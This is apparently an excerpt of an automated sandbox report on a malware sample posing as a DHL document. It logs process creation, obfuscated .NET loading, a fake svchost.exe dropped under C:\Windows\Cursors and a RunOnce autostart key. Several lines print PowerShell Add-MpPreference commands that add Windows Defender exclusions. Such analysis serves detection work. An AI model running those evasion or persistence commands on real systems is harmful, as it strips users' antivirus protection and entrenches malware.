          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: DHL_document1102202068090891.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL_document1102202068090891.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: .pdb8 source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
          Source: Binary string: DHL_document1102202068090891.PDBp source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.518675957.00000000012BE000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.518266676.00000000015E7000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000011.00000002.518543220.00000000012B1000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb: source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp
          Source: Binary string: S:AI(RA;IOOICI;;;;WD;("IMAGELOAD",TU,0x0,0x01))\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: IL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518833808.0000000001610000.00000004.00000020.sdmp
          Source: Binary string: 00240000048000009400000006020000002400005253413C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000011.00000002.519520008.00000000012F3000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb1l source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.517829728.00000000015D9000.00000004.00000020.sdmp
          Source: Binary string: kc.pdbis/P} source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB/ source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb/C:/Windows/System32/cmd.exe source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbC:\Users\user\Documentsr source: svchost.exe, 00000011.00000002.515773658.0000000001255000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdbt source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
          Source: Binary string: Windows.Foundation.Collections.ValueSet\??\C:\Windows\symbols\dll\mscorlib.pdb source: svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb} source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48D9 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48FD push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48F9 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48F5 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48F1 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D48ED push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D4911 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D490D push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D4909 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D4905 push es; retf
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D4901 push es; retf
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040B550 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040B550 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040B50D push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 14_2_0040B550 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 14_2_0040B550 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 14_2_0040B50D push ecx; ret
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeCode function: 28_2_05749317 push F000005Eh; retf
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

          Persistence and Installation Behavior:

          barindex
          Drops PE files with benign system namesShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeJump to dropped file
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an autostart registry key pointing to binary in C:\WindowsShow sources
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaAJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaAJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaAJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaAJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaAJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
